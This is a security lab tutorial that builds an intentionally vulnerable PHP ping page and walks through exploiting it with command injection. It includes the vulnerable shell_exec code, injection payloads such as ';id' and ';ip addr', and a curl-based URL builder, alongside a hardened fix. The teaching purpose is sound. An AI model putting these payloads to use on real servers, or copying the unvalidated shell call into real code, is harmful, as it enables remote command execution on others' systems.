Vulnerability Research and Target Setup
Self-Developed Command Injection Vulnerability
Summary
For this project we will design and deploy a self-developed web application containing an intentional command injection vulnerability. This simulates a common security flaw: passing user input directly into a system command without validating or escaping it.
The vulnerable application will consist of a simple web page that allows a user to "ping" an IP address. The server-side PHP code will take the input from the URL parameter and execute it using the shell_exec() function without performing any input validation, sanitization, or escaping. Because of this, an attacker can append additional shell commands and achieve remote command execution (RCE) on the server.
We will host this application on an Ubuntu-based virtual machine derived from the cyber.local base images. After configuring Apache and PHP, we will create a vulnerable ping.php file. From an attacker machine, we will demonstrate exploitation by injecting system commands via the web interface, confirming that the server executes arbitrary OS commands under the context of the web server user.
Video Walkthrough
Setting Up Your VM
For this lab I will be using a Xubuntu VM within the VirtualBox hypervisor. This lab can easily be done in any Linux environment as long as it supports:
Apache (or Nginx)
PHP
A simple web directory (like /var/www/html)
Basic Bash utilities
Most, if not all, Linux distros provide these. We are using Xubuntu as the target machine because it is lightweight, which makes it well suited to a classroom environment. Since Xubuntu is part of the Ubuntu family, it supports Apache, PHP, and all the required system tools without any special configuration, so the vulnerability can be reproduced by instructors and classmates on any Ubuntu-based system.
Import Your VM
Within VirtualBox do the following to import your VM:
Press Import
Find the OVA File you downloaded

Keep the default settings
Press Finish
You should see your VM in the left side panel

Take a Snapshot!
It's best practice to take a snapshot of your VM before making changes, especially when performing actions that may be malicious or have the potential to corrupt your system.
Click on the VM
In the right pane you should see a Snapshots section
Right-click in that section and choose Take
Name your snapshot and give it a description that will be helpful for you to remember.

Install Apache and PHP
Once you power on your VM, go to the terminal and run the following commands:
If you get errors when trying to install Apache and PHP, the most likely cause is that your Ubuntu release has reached End of Life and Canonical no longer publishes package updates for it on the regular mirrors. To check whether your release is EOL, see the official list here --> https://documentation.ubuntu.com/project/release-team/list-of-releases/
Fix Ubuntu EOL Issue
Here is what I did to fix my EOL VM issue:
Checked my Ubuntu version with cat /etc/os-release to find what version I was running.

Checked whether that version was EOL on the Canonical website (it was).

The repositories for older releases that are not supported get moved to an archive server. To continue using an outdated release, edit /etc/apt/sources.list and change archive.ubuntu.com and security.ubuntu.com to old-releases.ubuntu.com. This can also be done using the sed command:
Then upgrade with the following:
Once you have done this step, go back and run the two commands to install PHP and Apache from the step before.
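The steps above, collected into one script, as an added example that is not part of the original lab page: the sed rewrite of the apt sources, the update/upgrade step, and the Apache and PHP install. It assumes the classic /etc/apt/sources.list layout (Ubuntu 24.04 and later keep their entries in /etc/apt/sources.list.d/ubuntu.sources instead) and that the lab's two install commands correspond to the apache2, php and libapache2-mod-php packages; the sample sources.list used for the check is constructed.

```shell
#!/bin/sh
# Added example (not the page's own commands): repoint an end-of-life Ubuntu
# release's apt sources at old-releases.ubuntu.com, then refresh, upgrade and
# install Apache with PHP. Assumptions: the file is the classic
# /etc/apt/sources.list (Ubuntu 24.04+ uses /etc/apt/sources.list.d/ubuntu.sources
# instead), and "apache2 php libapache2-mod-php" are the packages behind the
# lab's two install commands.

# Rewrite archive.ubuntu.com, security.ubuntu.com and country mirrors such as
# us.archive.ubuntu.com to old-releases.ubuntu.com, keeping a .bak copy.
fix_old_release_sources() {
    sed -E -i.bak 's#([a-z]{2}\.)?(archive|security)\.ubuntu\.com#old-releases.ubuntu.com#g' "$1"
}

# How many lines still reference the live mirrors; 0 means every entry was moved.
remaining_live_mirrors() {
    grep -Ec '(archive|security)\.ubuntu\.com' "$1" || true
}

# The update/upgrade step that follows the rewrite.
refresh_and_upgrade() {
    apt-get update && apt-get -y upgrade
}

# The Apache + PHP install step (the "two commands" of the earlier section).
install_web_stack() {
    apt-get install -y apache2 php libapache2-mod-php
}

# Run as root: sh fix_eol.sh --apply
if [ "${1:-}" = "--apply" ]; then
    fix_old_release_sources /etc/apt/sources.list
    [ "$(remaining_live_mirrors /etc/apt/sources.list)" = "0" ] \
        || echo "warning: some entries were not rewritten" >&2
    refresh_and_upgrade
    install_web_stack
fi
```

The check function is there because a partially rewritten sources.list is the usual reason the install still fails afterwards: a country mirror such as us.archive.ubuntu.com is missed by a sed that only matches the bare archive.ubuntu.com host.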
Create a Vulnerable App
Delete default index.html and make your own
To personalize our site we can delete the default Apache page with the command sudo rm /var/www/html/index.html
We can then make our own website! I chose to make mine sparkle-themed, but you can do a basic HTML site, and this will still work.
Here is my decked-out sparkle website! (Generated with Claude.ai)

Once a user submits an IP address by pressing the Ping It button, they are taken to another web page that shows the status of the ping:

To get the lab working, these are the bare essentials of the two files, without any of the styling -->
Index.html
Ping.php
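The two barebones files, written out by a small script, as an added example that is not the page's own code. The form field and query parameter are assumed to be called ip and ping is assumed to run with -c 4; neither detail is stated on the page. Alongside the intentionally vulnerable ping.php it also writes a ping_safe.php that shows the fix: validate the value as an IP address, pass it to the shell as a single quoted argument, and HTML-encode the output.

```shell
#!/bin/sh
# Added example (not the page's own files): writes the barebones index.html and
# ping.php the lab needs into a web root, plus a hardened ping_safe.php for
# comparison. Assumptions: the form field and query parameter are named "ip",
# ping runs with "-c 4", and the web root defaults to /var/www/html.

write_lab_files() {
    webroot="${1:-/var/www/html}"
    mkdir -p "$webroot"

    # Replacement for Apache's default index.html: a form that submits the
    # address to ping.php via GET, so the value shows up in the URL.
    cat > "$webroot/index.html" <<'EOF'
<!DOCTYPE html>
<html>
<body>
  <h1>Ping It</h1>
  <form action="ping.php" method="get">
    <input type="text" name="ip" placeholder="IP address">
    <button type="submit">Ping It</button>
  </form>
</body>
</html>
EOF

    # The intentionally vulnerable handler: the raw parameter is concatenated
    # into the command string, so ";", "&&", "||" and "|" are parsed by /bin/sh.
    cat > "$webroot/ping.php" <<'EOF'
<?php
$ip = $_GET['ip'] ?? '';
$output = shell_exec("ping -c 4 " . $ip);
echo "<pre>" . $output . "</pre>";
EOF

    # Hardened form, for comparison: allowlist the value as an IP address,
    # quote it as one argument with escapeshellarg(), and encode the output.
    cat > "$webroot/ping_safe.php" <<'EOF'
<?php
$ip = $_GET['ip'] ?? '';
if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
    http_response_code(400);
    exit('Invalid IP address');
}
$output = shell_exec('ping -c 4 ' . escapeshellarg($ip));
echo '<pre>' . htmlspecialchars((string) $output) . '</pre>';
EOF
}

# True when all three lab files exist under the given web root.
lab_files_present() {
    webroot="${1:-/var/www/html}"
    [ -f "$webroot/index.html" ] && [ -f "$webroot/ping.php" ] && [ -f "$webroot/ping_safe.php" ]
}

# Run as root on the lab VM: sh create_lab.sh --install /var/www/html
if [ "${1:-}" = "--install" ]; then
    write_lab_files "${2:-/var/www/html}"
    lab_files_present "${2:-/var/www/html}" && echo "lab files written"
fi
```

In ping_safe.php the filter_var() check is the real control: it rejects anything that is not an IP address before a shell is involved. escapeshellarg() is kept as defence in depth, and htmlspecialchars() stops the ping output (or an attacker's echo) being rendered as HTML.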
Exploit Vulnerable Web app
Notice the URL when you send a request for a ping to a specific IP address. We can do something called "chaining commands" at the end of our URL to inject commands.
Chaining Commands
; (semicolon): execute multiple commands sequentially.
&& (AND): execute the second command only if the first command succeeds (returns a zero exit status).
|| (OR): execute the second command only if the first command fails (returns a non-zero exit status).
& (background): run the first command in the background, allowing the shell to continue with the next.
| (pipe): take the output of the first command and use it as the input for the second command.
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md
IP addr in the text box
Try pinging your IP address again but this time adding ;ip addr to the end.

You should see the network interfaces of the web server itself: the injected ip addr runs on the machine that executes the ping, not on the address being pinged.
In this case the web server is the VM and I am pinging the host system, so the output shows the VM's addresses. In a real attack you would be on a separate attacker machine, and the injected commands would run on the target web server as the web server user, whatever address you put in front of the semicolon.

IP addr in the URL
Instead of putting the command in the text box, we can also append the command to the end of the URL after the semicolon, like below. Browsers usually send a literal ; and turn spaces into %20, but if you build the URL by hand (for example with curl) encode the payload yourself: ; is %3B, a space is %20, and & must be %26, since a bare & would start a new query parameter and cut the payload short.

This gives us the same output as putting it in the text box, because the form does nothing more than build this URL; anything that can send a GET request can exploit the page without touching the form.
Additional Commands to Try
Here are some additional commands to try for your exploit:
hostname --> get the hostname of the system
whoami --> print the current user
echo "text" --> echo something back to you
id --> show the current user with its uid, gid and groups
uname -a --> system info
uname -r --> kernel release
cat /etc/os-release --> distro info
who --> active logged-in users
pwd --> check the current directory
touch /tmp/file.txt --> put a file on the system in the /tmp directory
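To see exactly why the payloads above work, here is an added example (not the page's own code) that reproduces offline what ping.php does when it hands the concatenated string to shell_exec(), next to a hardened handler that refuses the same input, and that builds the URL form of a payload for curl. Assumptions not stated on the page: the query parameter is called ip, TARGET is a placeholder lab address, and ping -c 1 -W 1 (Linux flags) stands in for whatever ping options the real page uses.

```shell
#!/bin/sh
# Added example for this lab page (not the page's own code). It reproduces,
# offline, what the lab's ping.php does when shell_exec() receives
# "ping ... <input>", so the effect of each chaining operator can be tried
# without a second VM, and it builds the URL form of the same payload.
#
# Assumptions (not stated on the page): the query parameter is called "ip",
# TARGET is a placeholder lab address, and "ping -c 1 -W 1" (Linux ping flags)
# stands in for whatever ping options the real page uses.

TARGET="${TARGET:-192.0.2.10}"

# What shell_exec("ping -c 1 -W 1 " . $_GET['ip']) does: the raw parameter is
# concatenated into one string and /bin/sh parses it, operators included.
vulnerable_ping_handler() {
    sh -c "ping -c 1 -W 1 $1" 2>&1 || true
}

# Hardened analogue of the fix for ping.php: allowlist the input (a crude
# digits-and-dots check here; in PHP use filter_var($ip, FILTER_VALIDATE_IP))
# and pass it as a separate argument rather than splicing it into the command
# string, which is what escapeshellarg() achieves on the PHP side.
hardened_ping_handler() {
    case "$1" in
        ""|*[!0-9.]*) printf 'rejected: not an IPv4 address: %s\n' "$1" >&2; return 1 ;;
    esac
    sh -c 'ping -c 1 -W 1 "$1"' sh "$1" 2>&1 || true
}

# Percent-encode the characters that would otherwise break the query string
# when the payload goes in the URL instead of the text box: '&' would start a
# new parameter, '#' a fragment, and space, ';' and '|' must reach the server.
url_encode_payload() {
    printf '%s' "$1" | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/;/%3B/g' \
                           -e 's/&/%26/g' -e 's/|/%7C/g' -e 's/#/%23/g'
}

# Build http://TARGET/ping.php?ip=<address>;<command>, encoded.
build_attack_url() {
    printf 'http://%s/ping.php?ip=%s\n' "$TARGET" "$(url_encode_payload "$1;$2")"
}

# Send it with curl (network action; not exercised by the checks below).
send_payload() {
    curl -s "$(build_attack_url "$1" "$2")"
}

# Run: sh inject_demo.sh --demo
if [ "${1:-}" = "--demo" ]; then
    for payload in '127.0.0.1; id' '127.0.0.1 && id' '127.0.0.1 || id' '127.0.0.1 | wc -c'; do
        printf '== vulnerable handler, input: %s\n' "$payload"
        vulnerable_ping_handler "$payload"
    done
    printf '== hardened handler, input: 127.0.0.1; id\n'
    hardened_ping_handler '127.0.0.1; id' || printf '(refused)\n'
    printf '== URL form of the "; id" payload:\n'
    build_attack_url 127.0.0.1 'id'
fi
```

Running the demo with the four payloads shows the operator table in practice: the ; variant always runs id, && only runs it when the ping succeeds, || only when it fails (useful when the address is unreachable), and | feeds the ping output into the second command. The hardened handler never reaches the shell with those inputs because the space and the ; fail the allowlist.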